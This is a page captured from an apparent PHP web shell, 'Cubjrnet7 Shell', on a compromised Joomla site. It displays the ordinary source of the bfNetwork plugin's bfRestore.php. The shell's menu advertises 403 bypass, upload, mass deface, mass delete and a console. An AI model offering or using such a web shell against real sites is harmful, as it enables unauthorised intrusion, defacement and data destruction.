shell bypass 403

Cubjrnet7 Shell

: /home/eklavya/www/plugins/system/bfnetwork/bfnetwork/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : bfRestore.php
<?php

/*
 * @package   bfNetwork
 * @copyright Copyright (C) 2011,2012,2013,2014,2015,2016,2017,2018,2019,2020,2021,2022,2023,2024,2025 Blue Flame Digital Solutions Ltd. All rights reserved.
 * @license   GNU General Public License version 3 or later
 *
 * @see       https://mySites.guru/
 * @see       https://www.phil-taylor.com/
 *
 * @author    Phil Taylor / Blue Flame Digital Solutions Limited.
 *
 * bfNetwork is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * bfNetwork is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this package.  If not, see http://www.gnu.org/licenses/
 *
 * If you have any questions regarding this code, please contact [email protected]
 */

error_reporting(0);
ini_set('display_errors', 0);

$_REQUEST['password'] = null;
$_REQUEST['task']     = null;
$_REQUEST['instance'] = null;

$obj                  = json_decode($_REQUEST['json']);
$_REQUEST['password'] = $obj->update_password;

if (file_exists(dirname(__FILE__, 5) . '/administrator/components/com_joomlaupdate/restore.php')) {
    chdir(dirname(__FILE__, 5) . '/administrator/components/com_joomlaupdate/');
    require dirname(__FILE__, 5) . '/administrator/components/com_joomlaupdate/restore.php';
    die;
}

if ($obj->task === 'startRestore') {
    $_REQUEST['task'] = 'startExtract';
}
if ($obj->task === 'stepRestore') {
    $_REQUEST['task'] = 'stepExtract';
}
if ($obj->task === 'finalizeRestore') {
    $_REQUEST['task'] = 'finalizeUpdate';
}

if (property_exists($obj, 'factory')) {
    $_REQUEST['instance'] = $obj->factory;
}

if ($_REQUEST['password'] !== null && $_REQUEST['task'] !== null) {
    echo '###';
    if (file_exists(dirname(__FILE__, 5) . '/administrator/components/com_joomlaupdate/extract.php')) {
        require dirname(__FILE__, 5) . '/administrator/components/com_joomlaupdate/extract.php';
        die;
    }
}
if (! headers_sent()) {
    header('HTTP/1.0 404 Not Found');
}

© 2025 Cubjrnet7